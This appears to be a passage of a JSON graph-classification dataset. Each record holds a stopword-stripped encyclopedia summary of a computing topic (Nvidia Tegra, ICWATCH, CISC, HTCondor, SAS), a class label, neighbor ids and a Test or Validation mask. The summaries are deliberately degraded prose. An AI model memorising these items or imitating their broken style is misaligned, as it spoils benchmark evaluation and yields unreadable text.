vcm powers 17-inch touchscreen infotainment system one drives 12.3-inch digital instrument cluster march 2015 nvidia announced tegra x1 first soc graphics performance 1 teraflop announcement event nvidia showed epic games unreal engine 4 elemental demo running tegra x1 october 20 2016 nvidia announced nintendo upcoming switch hybrid home/portable game console powered tegra hardware march 15 2017 techinsights revealed nintendo switch powered tegra x1 model t210 second generation tegra soc dual-core arm cortex-a9 cpu ultra low power ulp geforce gpu 32-bit memory controller either lpddr2-600 ddr2-667 memory 32kb/32kb l1 cache per core shared 1mb l2 cache tegra 2 cortex a9 implementation include arm simd extension neon version tegra 2 soc supporting 3d displays soc uses higher clocked cpu gpu tegra 2 video decoder largely unchanged original tegra limited support hd formats lack support high-profile h.264 particularly troublesome using online video streaming services common features tegra 3 codenamed kal-el functionally soc quad-core arm cortex-a9 mpcore cpu includes fifth companion core nvidia refers variable smp architecture cores cortex-a9s companion core manufactured low-power silicon process core operates transparently applications used reduce power consumption processing load minimal main quad-core portion cpu powers situations tegra 3 first tegra release support arm simd extension neon gpu tegra 3 evolution tegra 2 gpu 4 additional pixel shader units higher clock frequency also output video 2560×1600 resolution supports 1080p mpeg-4 avc/h.264 40 mbit/s high-profile vc1-ap simpler forms mpeg-4 divx xvid tegra 3 released november 9 2011 common features tegra 4 codenamed wayne announced january 6 2013 soc quad-core cpu includes fifth low-power cortex a15 companion core invisible os performs background tasks save power power-saving configuration referred variable smp architecture operates like similar configuration tegra 3 geforce gpu tegra 4 evolution predecessors however numerous feature additions efficiency improvements implemented number processing resources dramatically increased clock rate increased well 3d tests tegra 4 gpu typically several times faster tegra 3 additionally tegra 4 video processor full support hardware decoding encoding webm video 1080p 60mbit/s 60fps along tegra 4 nvidia also introduced i500 optional software modem based nvidia acquisition icera reprogrammed support new network standards supports category 3 100mbit/s lte later updated category 4 150mbit/s common features pixel shaders vertex shaders pixel pipelines tegra 4i codenamed grey announced february 19 2013 hardware support audio video formats using cortex-a9 cores instead cortex-a15 tegra 4i low-power variant tegra 4 designed phones tablets unlike tegra 4 counterpart tegra 4i also integrates icera i500 lte/hspa+ baseband processor onto die common features pixel shaders vertex shaders pixel pipelines nvidia ’ tegra k1 codenamed logan features arm cortex-a15 cores 4+1 configuration similar tegra 4 nvidia 64-bit project denver dual-core processor well kepler graphics processing unit support direct3d 12 opengl es 3.1 cuda 6.5 opengl 4.4/opengl 4.5 vulkan nvidia claims outperforms xbox 360 ps3 whilst consuming significantly less power support adaptive scalable texture compression late april 2014 nvidia shipped jetson tk1 development board containing tegra k1 soc running ubuntu linux unified shaders texture mapping units render output units december 2015 web page wccftech.com published article stating tesla going use tegra k1 based design derived template nvidia visual computing module vcm driving infotainment systems providing visual driving aid respective vehicle models time news found similar successor clear confirmation later place combination multimedia auto pilot system vehicle models nvidia tegra x1 codenamed erista features four arm cortex-a57 cores four arm cortex-a53 cores well maxwell-based graphics processing unit supports adaptive scalable texture compression contrary initial belief nvidia use eight cores arm big.little configuration instead devices utilizing tegra x1 always show four arm cortex-a57 cores available four arm cortex-a53 cores accessed operating system used automatically low power scenarios determined cpu nvidia tegra x2 codenamed parker features nvidia custom general-purpose armv8-compatible core denver 2 well code-named pascal graphics processing core gpgpu support chips made using finfet process technology using tsmc 16 nm finfet+ manufacturing process recent tegra soc xavier named comic book character professor x announced 28 september 2016 march 2019 released contains 7 billion transistors 8 custom armv8 cores volta gpu 512 cuda cores open sourced tpu tensor processing unit called dla deep learning accelerator able encode decode 8k ultra hd 7680×4320 users configure operating modes 10w 15w 30w tdp needed die size 350 mm nvidia confirmed fabrication process 12 nm finfet ces 2018 linux kernel mailing list tegra194 based development board type id p2972-0000 got reported board consists p2888 compute module p2822 baseboard nvidia announced next-gen soc codename orin resembling name aquaman comic hero march 27 2018 gpu technology conference 2018 presentations already indicate design two orin chips planned par performance pegasus board four chips supposed formed two xavier chips two gpu chips factor five performance xavier orin seems indicated nowiki /nowiki pixel shaders vertex shaders since kepler unified shaders used nvidia distributes proprietary device drivers tegra oems part linux tegra formerly l4t development kit newer powerful devices tegra family supported nvidia vibrante linux distribution vibrante comes larger set gnu/linux tools plus several nvidia provided libraries acceleration area data processing especially image processing driving safety automated driving level deep learning neuronal networks make e.g heavy use cuda capable accelerator blocks via opencv make use neon vector extensions arm cores due different business needs geforce line graphics cards nvidia one embedded partners avionic design gmbh germany also working submitting open-source drivers tegra upstream mainline linux kernel nvidia co-founder ceo laid tegra processor roadmap using ubuntu unity gpu technology conference 2013 end 2018 evident nvidia employees contributed substantial code parts make t186 t194 models run hdmi display audio upcoming official linux kernel 4.21 q1 2019 thus positively affected software modules open source nouveau closed source nvidia graphics drivers along nvidia proprietary cuda interface drive px2 board announced qnx rtos support april 2016 gpu technology conference socs platforms comparable specifications e.g audio/video input output processing capability connectivity programmability entertainment/embedded/automotive capabilities certifications power consumption",
    "neighbors": [
      3585,
      7170,
      8720,
      11282,
      9235,
      3605,
      11289,
      10784,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      5681,
      8250,
      1083,
      11322,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      4211,
      5237,
      10361,
      6268,
      638,
      3203,
      644,
      11396,
      8842,
      146,
      659,
      1170,
      1682,
      7833,
      666,
      5786,
      4258,
      4259,
      6818,
      4773,
      9913,
      8383,
      10945,
      196,
      9928,
      4816,
      4821,
      10971,
      6878,
      2788,
      2277,
      3301,
      8937,
      9964,
      1776,
      9970,
      6900,
      6391,
      3835,
      2811,
      2814,
      7941,
      781,
      6925,
      9489,
      2838,
      6949,
      1832,
      5417,
      810,
      2862,
      7988,
      10548,
      11062,
      1849,
      7481,
      6971,
      321,
      6978,
      8003,
      8514,
      6981,
      10562,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      8035,
      9581,
      11629,
      11630,
      6001,
      9076,
      373,
      6009,
      2937,
      8058,
      392,
      8584,
      1428,
      8090,
      4508,
      10658,
      5028,
      7077,
      9638,
      7086,
      10675,
      3511,
      9155,
      7111,
      9163,
      7631,
      6608,
      3537,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      2525,
      9182,
      10223,
      5617,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 2636,
    "label": 4,
    "text": "ICWATCH:icwatch icwatch public database mainly linkedin profiles people united states intelligence community database created transparency toolkit hosted wikileaks publication global surveillance disclosures 2013 revealed code names surveillance projects including marina mainway discovered linkedin profiles individuals intelligence community mentioned code names well additional ones transparency toolkit took advantage automated collection linkedin profiles mentioning code names collating searchable database name icwatch play icreach alleged top-secret surveillance-related search engine created united states national security agency nsa september 11 attacks initial commit git repository lookingglass made august 23 2014 lookingglass search tool built use icwatch icwatch launched may 6 2015 day transparency toolkit group created icwatch presented conference launch database contained information 27,000 linkedin profiles mid-may 2015 transparency toolkit began receiving requests individuals removed icwatch including death threats following threats well distributed denial-of-service attacks made site wikileaks began hosting website database end may 2015 may 20 2015 number profiles icwatch increased almost 140,000 august 2016 techcrunch reported linkedin suing 100 unnamed individuals scraped linkedin website named icwatch possible target database tracks 100,000 profiles linkedin indeed public sources database searched using company location industry parameters intelligence workers discovered profiles national security agency working contractors project also revealed possible trends employment intelligence community instance number people claiming work sigint databases … increased dramatically years since 2008 small decline starting 2013 m. c. mcgrath transparency toolkit believes workers part pretty normal people ian paul pc world voiced concern safety individuals listed database",
    "neighbors": [
      3462,
      6344,
      7887,
      7893,
      11221,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 2637,
    "label": 2,
    "text": "DexOS:dexos dexos 32-bit operating system written x86 assembly designed coders want direct access hardware including cpu graphics well-commented code documentation licensed free use license commercial non-commercial use written maintained craig bamford voluntary developers around world dexos two modes interaction graphical user interface gui command line interface available user boot version 5.0 dexos fasm port text editor image viewer full tcp/ip stack many games web server support sound ethernet cards programs following list commands supported dexos command line",
    "neighbors": [
      2179,
      292,
      6596,
      8262,
      9964,
      7983,
      499,
      5363,
      6675,
      1750,
      8729,
      9946,
      7483,
      7356,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 2638,
    "label": 3,
    "text": "Complex_instruction_set_computer:complex instruction set computer complex instruction set computer cisc computer single instructions execute several low-level operations load memory arithmetic operation memory store capable multi-step operations addressing modes within single instructions term retroactively coined contrast reduced instruction set computer risc therefore become something umbrella term everything risc large complex mainframe computers simplistic microcontrollers memory load store operations separated arithmetic instructions modern risc processor therefore much complex say modern microcontroller using cisc-labeled instruction set especially complexity electronic circuits also number instructions complexity encoding patterns typical differentiating characteristic risc designs use uniform instruction length almost instructions employ strictly separate load/store-instructions examples instruction set architectures retroactively labeled cisc system/360 z/architecture pdp-11 vax architectures data general nova many others well known microprocessors microcontrollers also labeled cisc many academic publications include motorola 6800 6809 68000-families intel 8080 iapx432 x86-family zilog z80 z8 z8000-families national semiconductor 32016 ns320xx-line mos technology 6502-family intel 8051-family others designs regarded borderline cases writers instance microchip technology pic labeled risc circles cisc others 6502 6809 described risc-like although complex addressing modes well arithmetic instructions operate memory contrary risc-principles risc philosophy became prominent many computer architects tried bridge so-called semantic gap i.e. design instruction sets directly support high-level programming constructs procedure calls loop control complex addressing modes allowing data structure array accesses combined single instructions instructions also typically highly encoded order enhance code density compact nature instruction sets results smaller program sizes fewer slow main memory accesses time early 1960s onwards resulted tremendous saving cost computer memory disc storage well faster execution also meant good programming productivity even assembly language high level languages fortran algol always available appropriate indeed microprocessors category sometimes still programmed assembly language certain types critical applications 1970s analysis high-level languages indicated complex machine language implementations determined new instructions could improve performance instructions added never intended used assembly language fit well compiled high-level languages compilers updated take advantage instructions benefits semantically rich instructions compact encodings seen modern processors well particularly high-performance segment caches central component opposed embedded systems fast complex expensive memories inherently limited size making compact code beneficial course fundamental reason needed main memories i.e. dynamic ram today remain slow compared high-performance cpu core many designs achieved aim higher throughput lower cost also allowed high-level language constructs expressed fewer instructions observed always case instance low-end versions complex architectures i.e using less hardware could lead situations possible improve performance using complex instruction procedure call enter instruction instead using sequence simpler instructions one reason architects microcode writers sometimes over-designed assembly language instructions including features could implemented efficiently basic hardware available could instance side effects conventional flags setting register memory location perhaps seldom used done via ordinary non duplicated internal buses even external bus would demand extra cycles every time thus quite inefficient even balanced high-performance designs highly encoded relatively high-level instructions could complicated decode execute efficiently within limited transistor budget architectures therefore required great deal work part processor designer cases simpler typically slower solution based decode tables and/or microcode sequencing appropriate time transistors components limited resource also left fewer components less opportunity types performance optimizations circuitry performs actions defined microcode many cisc processors processor many ways reminiscent structure early cpu designs early 1970s gave rise ideas return simpler processor designs order make feasible cope without relatively large expensive rom tables and/or pla structures sequencing and/or decoding first retroactively risc- labeled processor ibm 801 ibm watson research center mid-1970s tightly pipelined simple machine originally intended used internal microcode kernel engine cisc designs also became processor introduced risc idea somewhat larger public simplicity regularity also visible instruction set would make easier implement overlapping processor stages pipelining machine code level i.e level seen compilers however pipelining level already used high performance cisc supercomputers order reduce instruction cycle time despite complications implementing within limited component count wiring complexity feasible time internal microcode execution cisc processors hand could less pipelined depending particular design therefore less akin basic structure risc processors modern context complex variable-length encoding used typical cisc architectures makes complicated still feasible build superscalar implementation cisc programming model directly in-order superscalar original pentium out-of-order superscalar cyrix 6x86 well known examples frequent memory accesses operands typical cisc machine may limit instruction level parallelism extracted code although strongly mediated fast cache structures used modern designs well measures due inherently compact semantically rich instructions average amount work performed per machine code unit i.e per byte bit higher cisc risc processor may give significant advantage modern cache based implementation transistors logic plas microcode longer scarce resources large high-speed cache memories limited maximum number transistors today although complex transistor count cisc decoders grow exponentially like total number transistors per processor majority typically used caches together better tools enhanced technologies led new implementations highly encoded variable length designs without load-store limitations i.e non-risc governs re-implementations older architectures ubiquitous x86 see well new designs microcontrollers embedded systems similar uses superscalar complexity case modern x86 solved converting instructions one micro-operations dynamically issuing micro-operations i.e indirect dynamic superscalar execution pentium pro amd k5 early examples allows fairly simple superscalar design located fairly complex decoders buffers giving speak best worlds many respects technique also used ibm z196 later z/architecture microprocessors terms cisc risc become less meaningful continued evolution cisc risc designs implementations first highly tightly pipelined x86 implementations 486 designs intel amd cyrix ibm supported every instruction predecessors achieved maximum efficiency fairly simple x86 subset little typical risc instruction set i.e without typical risc load-store limitations intel p5 pentium generation superscalar version principles however modern x86 processors also typically decode split instructions dynamic sequences internally buffered micro-operations helps execute larger subset instructions pipelined overlapping fashion also facilitates advanced extraction parallelism code stream even higher performance contrary popular simplifications present also academic texts ciscs microcoded complex instructions cisc became catch-all term meaning anything load-store risc architecture number instructions complexity implementation instructions define cisc fact arithmetic instructions also perform memory accesses compared small 8-bit cisc processor risc floating-point instruction complex cisc even need complex addressing modes 32 64-bit risc processors may well complex addressing modes small 8-bit cisc processors pdp-10 pdp-8 intel 80386 intel 4004 motorola 68000 system z mainframe burroughs b5000 vax zilog z80000 mos technology 6502 vary wildly number sizes formats instructions number types sizes registers available data types hardware support operations like scanning substring arbitrary-precision bcd arithmetic transcendental functions others 8-bit addition subtraction cisc category load-operate instructions load and/or store memory contents within instructions perform actual calculations instance pdp-8 8 fixed-length instructions microcode cisc instructions work powerpc 230 instructions vaxes complex internals like register renaming reorder buffer risc minimal cisc 8 instructions clearly cisc combines memory access computation instructions",
    "neighbors": [
      512,
      7173,
      9739,
      4108,
      9741,
      5649,
      2066,
      7699,
      5655,
      10779,
      8732,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2620,
      2623,
      2113,
      7234,
      3142,
      1103,
      6742,
      1119,
      1122,
      7269,
      3175,
      4204,
      8815,
      7281,
      9330,
      8820,
      630,
      7286,
      8822,
      4217,
      9851,
      6268,
      3197,
      8325,
      7302,
      7305,
      7313,
      8851,
      6804,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      11447,
      8890,
      2237,
      4286,
      5309,
      2241,
      2243,
      6339,
      9932,
      5329,
      8917,
      10966,
      731,
      11487,
      7911,
      10985,
      5354,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      3317,
      9976,
      249,
      10485,
      3323,
      5883,
      8700,
      1278,
      7941,
      1798,
      1801,
      5386,
      10508,
      6926,
      6415,
      1298,
      11539,
      7445,
      4886,
      3352,
      8474,
      2339,
      6950,
      3886,
      10548,
      309,
      8501,
      5948,
      4928,
      8514,
      10051,
      5444,
      4423,
      8523,
      6476,
      1869,
      11596,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      3960,
      7033,
      1402,
      5503,
      10111,
      3457,
      3459,
      3973,
      9095,
      9611,
      398,
      3470,
      5518,
      8590,
      5523,
      407,
      9111,
      409,
      10658,
      9126,
      426,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      1469,
      4030,
      453,
      3014,
      1998,
      5073,
      466,
      473,
      1499,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      1000,
      7657,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2639,
    "label": 5,
    "text": "Load-balanced_switch:load-balanced switch load-balanced switch switch architecture guarantees 100 throughput central arbitration cost sending packet across crossbar twice load-balanced switches subject research large routers scaled past point practical central arbitration internet routers typically built using line cards connected switch routers supporting moderate total bandwidth may use bus switch high bandwidth routers typically use sort crossbar interconnection crossbar output connects one input information flow every output simultaneously crossbars used packet switching typically reconfigured tens millions times per second schedule configurations determined central arbiter example wavefront arbiter response requests line cards send information one another perfect arbitration would result throughput limited maximum throughput crossbar input output example traffic coming line cards b destined line card c maximum traffic cards b process together limited c. perfect arbitration shown require massive amounts computation scales much faster number ports crossbar practical systems use imperfect arbitration heuristics islip computed reasonable amounts time load-balanced switch related load balancing switch refers kind router used front end farm web servers spread requests single website across many servers shown figure right load-balanced switch n input line cards rate r connected n buffers link rate r/n buffers turn connected n output line cards rate r links rate r/n buffers center partitioned n virtual output queues input line card spreads packets evenly n buffers something clearly without contention buffer writes packets single buffer-local memory combined rate r. simultaneously buffer sends packets head virtual output queue output line card rate r/n card output line card clearly forward packets line contention buffer load-balanced switch acts shared-memory switch load-balanced switch essentially way scale shared-memory switch cost additional latency associated forwarding packets rate r/n twice stanford group investigating load-balanced switches concentrating implementations number buffers equal number line cards one buffer placed line cards two interconnection meshes actually mesh supplying rate 2r/n every pair line cards basic load-balanced switch architecture require buffers placed line cards number buffers line cards one interesting property load-balanced switch although mesh connecting line cards buffers required connect every line card every buffer requirement mesh act non-blocking crossbar connections responsive traffic pattern connection far simpler centrally arbitrated crossbar two packets destined output arrive back-to-back one line card spread two different buffers could two different occupancies packets could reordered time delivered output although reordering legal typically undesirable tcp perform well reordered packets adding yet latency buffering load-balanced switch maintain packet order within flows using local information one algorithm foff fully ordered frames first foff additional benefits removing vulnerability pathological traffic patterns providing mechanism implementing priorities stanford university tiny tera project see abrizio introduced switch architecture required least two chip designs switching fabric crossbar slice arbiter upgrading arbiter include load-balancing combining devices could reliability cost throughput advantages since line cards load-balanced switch need physically near one another one possible implementation use entire continent- global-sized backbone network interconnection mesh core routers line cards implementation suffers latencies increased twice worst-case transmission latency number intriguing advantages",
    "neighbors": [
      10924
    ],
    "mask": "Test"
  },
  {
    "node_id": 2640,
    "label": 5,
    "text": "Stop-and-wait_ARQ:stop-and-wait arq stop-and-wait arq also referred alternating bit protocol method telecommunications send information two connected devices ensures information lost due dropped packets packets received correct order simplest automatic repeat-request arq mechanism stop-and-wait arq sender sends one frame time special case general sliding window protocol transmit receive window sizes equal one greater one respectively sending frame sender n't send frames receives acknowledgement ack signal receiving valid frame receiver sends ack ack reach sender certain time known timeout sender sends frame timeout countdown reset frame transmission behavior basic example stop-and-wait however real-life implementations vary address certain issues design typically transmitter adds redundancy check number end frame receiver uses redundancy check number check possible damage receiver sees frame good sends ack receiver sees frame damaged receiver discards send ack—pretending frame completely lost merely damaged one problem ack sent receiver damaged lost case sender n't receive ack times sends frame receiver two copies frame n't know second one duplicate frame next frame sequence carrying identical data another problem transmission medium long latency sender timeout runs frame reaches receiver case sender resends packet eventually receiver gets two copies frame sends ack one sender waiting single ack receives two acks may cause problems assumes second ack next frame sequence avoid problems common solution define 1 bit sequence number header frame sequence number alternates 0 1 subsequent frames receiver sends ack includes sequence number next packet expects way receiver detect duplicated frames checking frame sequence numbers alternate two subsequent frames sequence number duplicates second frame discarded similarly two subsequent acks reference sequence number acknowledging frame stop-and-wait arq inefficient compared arqs time packets ack data received successfully twice transit time assuming turnaround time zero throughput channel fraction could solve problem one send one packet time larger sequence number use one ack set done go-back-n arq selective repeat arq",
    "neighbors": [
      2752,
      2912,
      1154,
      5071,
      2772,
      4918,
      7865,
      2203
    ],
    "mask": "Test"
  },
  {
    "node_id": 2641,
    "label": 7,
    "text": "Azure_Data_Lake:azure data lake azure data lake scalable data storage analytics service service hosted azure microsoft public cloud azure data lake service released november 16 2016 azure data lake built learnings technologies cosmos microsoft ’ internal big data system cosmos used store process data applications azure adcenter bing msn skype windows live cosmos features sql-like query engine called scope upon u-sql built users store structured semi-structured unstructured data produced applications including social networks relational data sensors videos web apps mobile desktop devices single azure data lake store account store trillions files single file greater petabyte size azure data lake analytics parallel on-demand job service parallel processing system based microsoft dryad solution dryad represent arbitrary directed acyclic graphs dags computation data lake analytics provides distributed infrastructure dynamically allocate de-allocate resources customers pay services use azure data lake analytics uses apache yarn central part apache hadoop govern resource management deliver operations across hadoop clusters microsoft azure data lake store supports application uses open apache hadoop distributed file system hdfs standard using data lake analytics users develop run parallel data transformation processing programs u-sql query language combines sql c u-sql designed evolution declarative sql language native extensibility user code written c u-sql uses c data types c expression language",
    "neighbors": [
      4704,
      5666,
      10413,
      1935,
      7537,
      11571,
      2004,
      2140
    ],
    "mask": "Test"
  },
  {
    "node_id": 2642,
    "label": 3,
    "text": "Formation_Z:formation z taking place year 2701 player controls robot transform aero fighter mission stop alien super weapon reaching earth robot may move forwards backwards jump aero fighter may travel anywhere screen limited fuel combination two must used avoid obstacles well destroy on-screen enemies extra points",
    "neighbors": [
      1776,
      10931,
      3788,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2643,
    "label": 4,
    "text": "Peter_Garza:peter garza peter garza born august 6 1960 united states computer forensics expert cybercrime investigator special agent naval criminal investigative service peter garza conducted first court-ordered internet wiretap united states investigating julio cesar ardita el griton hacking case ardita charged u.s. justice department using compromised user accounts harvard university hack government university computer systems u.s. abroad ardita pleaded guilty may 19 1998 united states district court massachusetts unlawfully intercepting electronic communications damaging files military computer systems garza founded evidentdata inc. private sector consulting firm specializing computer forensics electronic discovery expert consulting 1999 evidentdata acquired first advantage left 2009 form data forté garza continues involved many high-profile civil cases gave expert testimony regarding altered electronic documents case beckman coulter inc. v. dovatron international inc. resulted 934 million jury award testified regarding critical deleted recoverable data case steinberg moorad dunn inc. v. dunn brought sports agent leigh steinberg former partner david dunn resulted 45 million jury award peter garza earned master science information systems claremont graduate university 2001 also developed taught graduate course computer forensics california state polytechnic university pomona",
    "neighbors": [
      4945,
      4956,
      9319
    ],
    "mask": "Test"
  },
  {
    "node_id": 2644,
    "label": 2,
    "text": "Object_Description_Language:object description language object description language odl original interface definition language created microsoft specifying interfaces used ole automation superset omg idl microsoft provided utility codice_1 compile odl files odl merged microsoft interface definition language",
    "neighbors": [
      8473,
      10465,
      8262,
      1407
    ],
    "mask": "None"
  },
  {
    "node_id": 2645,
    "label": 2,
    "text": "List_of_Linux_containers:list linux containers linux containers implementations operating system-level virtualization linux operating system several implementations exist based virtualization isolation resource management mechanisms provided linux kernel notably linux namespaces cgroups include",
    "neighbors": [
      318,
      5378,
      7140,
      295,
      4238,
      7983,
      7920,
      823,
      2236,
      2910
    ],
    "mask": "Test"
  },
  {
    "node_id": 2646,
    "label": 4,
    "text": "Clear_channel_assessment_attack:clear channel assessment attack clear channel assessment attack queensland attack physical layer dos attack wi-fi networks attack focuses need wireless network receive clear channel assessment function within csma/ca determine whether wireless medium ready able receive data transmitter may start sending attack makes appear airwaves busy basically puts entire system hold attack works 802.11b effective ofdm-based protocols 802.11g 802.11a however hybrid 802.11b/g access points hinder 802.11g network 802.11b network attacked attack originally discovered researchers queensland university technology information security research center thus name queensland attack comes signal telling system airwaves busy course sent attacker nic placing continuous transmit mode attack set use intersil prism test utility prismtestutil322.exe",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2647,
    "label": 9,
    "text": "MOL-360:mol-360 mol-360 mid-level systems programming language ibm system/360 family computers based algol data structure supported language arrays support floating point data allows direct access processor registers inline assembly language mol-360 used system development corporation sdc develop adept time-sharing system similar language mol940 written sds 940 computer system",
    "neighbors": [
      11075,
      8262,
      4998,
      1552,
      9911,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2648,
    "label": 4,
    "text": "Secure_environment:secure environment computing secure environment system implements controlled storage use information event computing data loss secure environment used protect personal and/or confidential data often secure environments employ cryptography means protect information secure environments employ cryptographic hashing simply verify information altered since last modified",
    "neighbors": [
      1801,
      5226
    ],
    "mask": "None"
  },
  {
    "node_id": 2649,
    "label": 3,
    "text": "Hareraiser:hareraiser hareraiser computer game originally released 1984 uk home computer platforms released two parts prelude finale prize worth £30,000 offer game could solved game released acorn electron amstrad cpc bbc micro model b commodore 64 commodore vic-20 ex dragon 32 msx oric atmos 48k sinclair zx spectrum 1984 £8.95 part game takes form series graphical screens depicting grass sky trees occasional text clues interaction pressing cursor keys follow hare moves across screen disappears one sides hints puzzle solved may case text position trees sun clouds elements different screen interpreted way solvers prelude would also buy solve finale could enter competition locate prize bejewelled 18 carat golden hare pendant featured cover golden hare previously prize solving book masquerade british artist kit williams buried secret location ampthill park bedfordshire object game solve clues book would lead successful treasure-hunter location golden prize several sources state erroneously hareraiser based masquerade fact thing apart prize two common feature hare haresoft founded dugald thompson controversial winner masquerade business partner john guard haresoft claimed game released two parts make fun enable competitors ages participate sinclair user magazine however suggested simply make money haresoft stated additional clue revealed harrods tv personality anneka rice nature clue remains unknown whether rice even revealed clue game sell well haresoft went liquidation hareraiser never solved hare sold sotheby auction creditors 1988 although given guide price £3,000–6,000 fact exceed haresoft stated value selling £31,900 although rumoured sold early 1990s whereabouts unknown 20 years july 2009 appeal made bbc radio 4 current owner granddaughter got touch kit williams reunited hare bbc tv documentary game awarded 3/10 sinclair user reviewer richard price struggling find reason play game except sincere need get rich norwich gaming festival 2017 comedian computer game historian stuart ashen described showed game play called worst game ever revealing solution videogame predecessor discovered via cheating ashen stated believed puzzle intentionally designed unsolvable haresoft would lose art piece golden hare",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2650,
    "label": 9,
    "text": "IMP_(programming_language):imp programming language imp early systems programming language developed edgar t. irons late 1960s early 1970s unlike systems programming languages imp even though designer refers language based algol imp excludes many defining features language supporting non-algol-like one syntax extensibility compiler imp existed early 1965 used programming cdc 6600 time-sharing system use institute defense analyses since 1967 although compiler slower comparable ones non-extensible languages used practical production work imp compilers developed cdc-6600 cray pdp-10 pdp-11 computers important imp versions imp65 imp70 imp72 imp allows programmer extend syntax although specific means provided add new datatypes structures achieve syntax-extensibility imp uses powerful parse algorithm based syntax graph several connectivity matrices programmer may add new bnf productions graph imp72 syntax extended means extended-bnf syntax statements included source program mechanism powerful allowed implementation language i.e. imp72 source file consisting entirely syntax statements input trivial compiler initially able translate simplest case syntax statement also simple form syntax statement looks like macro casual user basically syntax statement augmented bnf production associated semantics added right example add construct described following bnf semantics codice_1 translate codice_2 programmer would need insert following imp statement semantic-part also contain calls semantic routines following syntax statement semantic part statement consists call semantic routine codice_3 arguments octal constant codice_4 semantic routine call codice_5 codice_6 object top stack moment production invoked codice_3 semantic routine respectively takes arguments pdp-10 machine language opcode register object object produces object whose value result executing designated machine instruction using address field object last argument specific example opcode codice_4 designates codice_9 instruction thus result syntax statement compile code compute absolute value codice_6 imp language used nsa homegrown time-sharing system known folklore",
    "neighbors": [
      512,
      10560,
      11075,
      8262,
      7432,
      7634,
      372,
      1045,
      8474
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2651,
    "label": 7,
    "text": "HTCondor:htcondor htcondor open-source high-throughput computing software framework coarse-grained distributed parallelization computationally intensive tasks used manage workload dedicated cluster computers farm work idle desktop computersso-called cycle scavenging htcondor runs linux unix mac os x freebsd microsoft windows operating systems htcondor integrate dedicated resources rack-mounted clusters non-dedicated desktop machines cycle scavenging one computing environment htcondor developed htcondor team university wisconsin–madison freely available use htcondor follows open-source philosophy licensed apache license 2.0 htcondor makes use unused computing time leaving computers turned use htcondor increase energy consumption associated costs starting version 7.1.1 htcondor hibernate wake machines based user-specified policies feature previously available via third-party software htcondor formerly known condor name changed october 2012 resolve trademark lawsuit htcondor scheduler software used distribute jobs first draft assembly human genome way example nasa advanced supercomputing facility nas htcondor pool consists approximately 350 sgi sun workstations purchased used software development visualization email document preparation etc workstation runs daemon watches user i/o cpu load workstation idle two hours job batch queue assigned workstation run daemon detects keystroke mouse motion high non-htcondor cpu usage point job removed workstation placed back batch queue htcondor run sequential parallel jobs sequential jobs run several different universes including vanilla provides ability run batch ready programs standard universe target application re-linked htcondor i/o library provides remote job i/o job checkpointing htcondor also provides local universe allows jobs run submit host world parallel jobs htcondor supports standard message passing interface parallel virtual machine goux et al 2000 addition master worker mw library extremely parallel tasks htcondor-g allows htcondor jobs use resources direct control mostly used talk grid cloud resources like pre-ws ws globus nordugrid arc unicore amazon elastic compute cloud also used talk batch systems like torque/pbs lsf support sun grid engine currently development part egee project htcondor supports drmaa job api allows drmaa compliant clients submit monitor htcondor jobs saga c++ reference implementation provides htcondor plug-in adaptor makes htcondor job submission monitoring available via saga python c++ apis htcondor features include dagman provides mechanism describe job dependencies",
    "neighbors": [
      9665,
      4194,
      1507,
      5956,
      10051,
      198,
      5414,
      8702,
      6797,
      2990,
      7983,
      9040,
      5492,
      2710,
      823,
      11353,
      8030,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 2652,
    "label": 9,
    "text": "SAS_(software):sas software sas previously statistical analysis system software suite developed sas institute advanced analytics multivariate analysis business intelligence data management predictive analytics sas developed north carolina state university 1966 1976 sas institute incorporated sas developed 1980s 1990s addition new statistical procedures additional components introduction jmp point-and-click interface added version 9 2004 social media analytics product added 2010 sas software suite mine alter manage retrieve data variety sources perform statistical analysis sas provides graphical point-and-click user interface non-technical users advanced options sas language sas programs data steps retrieve manipulate data proc steps analyze data step consists series statements data step executable statements result software taking action declarative statements provide instructions read data set alter data appearance data step two phases compilation execution compilation phase declarative statements processed syntax errors identified afterwards execution phase processes executable statement sequentially data sets organized tables rows called observations columns called variables additionally piece data descriptor value proc step consists proc statements call upon named procedures procedures perform analysis reporting data sets produce statistics analyses graphics 300 procedures one contains substantial body programming statistical work proc statements also display results sort data perform operations sas macros pieces code variables coded referenced perform repetitive tasks sas data published html pdf excel formats using output delivery system first introduced 2007 sas enterprise guide sas point-and-click interface generates code manipulate data perform analysis automatically require sas programming experience use sas software suite 200 components sas components include development sas began 1966 north carolina state university re-hired anthony barr program analysis variance regression software would run ibm system/360 computers project funded national institute health originally intended analyze agricultural data improve crop yields barr joined student james goodnight developed software statistical routines two became project leaders 1968 barr goodnight integrated new multiple regression analysis variance routines 1972 issuing first release sas project lost funding according goodnight nih wanted fund projects medical applications goodnight continued teaching university salary 1 access mainframe computers use project funded university statisticians southern experiment stations following year john sall joined project 1973 contributed software econometrics time series matrix algebra another early participant caroll g. perkins contributed sas early programming jolayne w. service jane t. helwig created sas first documentation first versions sas named year released 1971 sas 71 published limited release used ibm mainframes main elements sas programming data step common procedures proc step following year full version released sas 72 introduced merge statement added features handling missing data combining data sets 1976 barr goodnight sall helwig removed project north carolina state incorporated sas institute inc. sas re-designed 